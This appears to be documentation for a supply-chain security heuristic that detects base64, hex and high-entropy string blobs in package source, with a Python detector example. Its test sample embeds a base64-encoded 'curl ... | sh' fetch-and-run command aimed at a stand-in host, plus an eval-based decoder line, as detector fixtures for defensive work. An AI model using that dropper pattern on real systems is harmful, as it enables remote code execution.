Encrypted/Encoded Blob Detection

Identifies encrypted/encoded data in customer dependencies that may be indicative of attempts to hide data and activity.

Description

Malware often attempts to hide activities by obfuscating data, strings and functions in the package source code. This inhibits analysis of the application by masking critical mechanisms the malicious code uses to operate.

These obfuscations are typically trivial to unravel, since they lean on common encodings such as base64 rather than real encryption. The presence of high-entropy or encoded blocks of data is not by itself indicative of malware: benign packages also embed encoded assets such as images, fonts, certificates and test fixtures. Nearly all malware, however, includes some encrypted or encoded data blocks, so the volume of such blocks in a package is a useful signal.

We identify obfuscated data in the source code of customer dependencies. If the number of obfuscated blocks exceeds the threshold, the package score is penalized.
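The detection described above, as an added example that is not Phylum's own code: it pulls string literals out of source text, classifies each long literal as hex, strictly-decoding base64, or high Shannon entropy, and reports whether the count crosses a threshold. The minimum literal length, entropy cut-off and blob threshold are assumptions chosen for the example; the page does not state the real values. The sample source is constructed inline.

```python
import base64
import binascii
import hashlib
import math
import re
import string
from collections import Counter

# Single- or double-quoted string literal (JavaScript/Python style), escapes allowed.
STRING_LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
BASE64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
HEX_SHAPE = re.compile(r"^(?:[0-9a-fA-F]{2}){16,}$")

# Tunables: assumptions for this example, not Phylum's thresholds.
MIN_LEN = 32         # literals shorter than this are ignored (messages, short URLs)
ENTROPY_BITS = 4.8   # bits/char; English prose is ~4.0-4.3, long URLs ~4.4, random base64 5-6
BLOB_THRESHOLD = 3   # number of blobs at which the heuristic penalizes the package


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, estimated from the literal's own symbol frequencies."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def looks_base64(s: str) -> bool:
    """Alphabet/padding shape check followed by a strict decode."""
    if not BASE64_SHAPE.match(s) or len(s) % 4:
        return False
    try:
        base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def classify(lit: str):
    """Return the blob kind for a literal, or None if it looks like ordinary text."""
    if len(lit) < MIN_LEN:
        return None
    if HEX_SHAPE.match(lit):          # hex first: a hex string is also valid base64
        return "hex"
    if looks_base64(lit):
        return "base64"
    if shannon_entropy(lit) >= ENTROPY_BITS:
        return "high-entropy"
    return None


def find_blobs(source: str):
    """Scan source text and return one record per suspicious string literal."""
    blobs = []
    for m in STRING_LITERAL.finditer(source):
        lit = m.group(2)
        kind = classify(lit)
        if kind:
            line = source.count("\n", 0, m.start()) + 1
            blobs.append({"line": line, "kind": kind, "length": len(lit),
                          "entropy": round(shannon_entropy(lit), 2)})
    return blobs


def exceeds_threshold(blobs) -> bool:
    """True when the package should be penalized under the assumed threshold."""
    return len(blobs) >= BLOB_THRESHOLD


# Constructed sample: a benign message and a long URL (must NOT be flagged), followed by
# the kinds of literals a dropper embeds: base64 URL, base64 command, hex blob, and a
# custom encoding alphabet of the sort obfuscators ship with their decoder.
SAMPLE_SOURCE = "\n".join([
    'const msg = "Hello from the package. Nothing to see here, move along.";',
    'const endpoint = "https://registry.npmjs.org/-/v1/search?text=phylum";',
    'const a = "%s";' % base64.b64encode(b"https://example.invalid/stage2.sh").decode(),
    'const b = "%s";' % base64.b64encode(b"curl -fsSL https://example.invalid/x | sh").decode(),
    'const c = "%s";' % hashlib.sha256(b"constructed").hexdigest(),
    'const alphabet = "%s";' % (string.ascii_letters + string.digits + "!#$%&*-"),
    'eval(Buffer.from(a, "base64").toString());',
])

if __name__ == "__main__":
    found = find_blobs(SAMPLE_SOURCE)
    for b in found:
        print(b)
    print("penalize:", exceeds_threshold(found))
```

The long registry URL is the instructive case: its entropy (about 4.4 bits/char) sits just under the cut-off, which is why a production heuristic leans on the shape checks and on counting blobs rather than on entropy alone.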

Importance

Large numbers of obfuscated strings are uncommon in benign software. A package that uses large numbers of obfuscated strings may be attempting to hide malicious behavior from the developer.

Risk Domains

Malicious Code, Author

Impact on the Phylum Package Score

The presence of encrypted, encoded or obfuscated strings is not, by itself, indicative of malicious behavior. It is, however, an interesting data point. Large numbers of obfuscated strings will have a moderate effect on lowering the package score.

Examples from the past

Obfuscated strings appear across most JavaScript exploit kits, where the goal is to hide behavior. The screenshot below is taken directly from a malicious code sample from 2017.

The long strings (highlighted in blue) are encoded payloads that likely decode to calls performing some malicious action. Items of this kind are what this heuristic identifies.
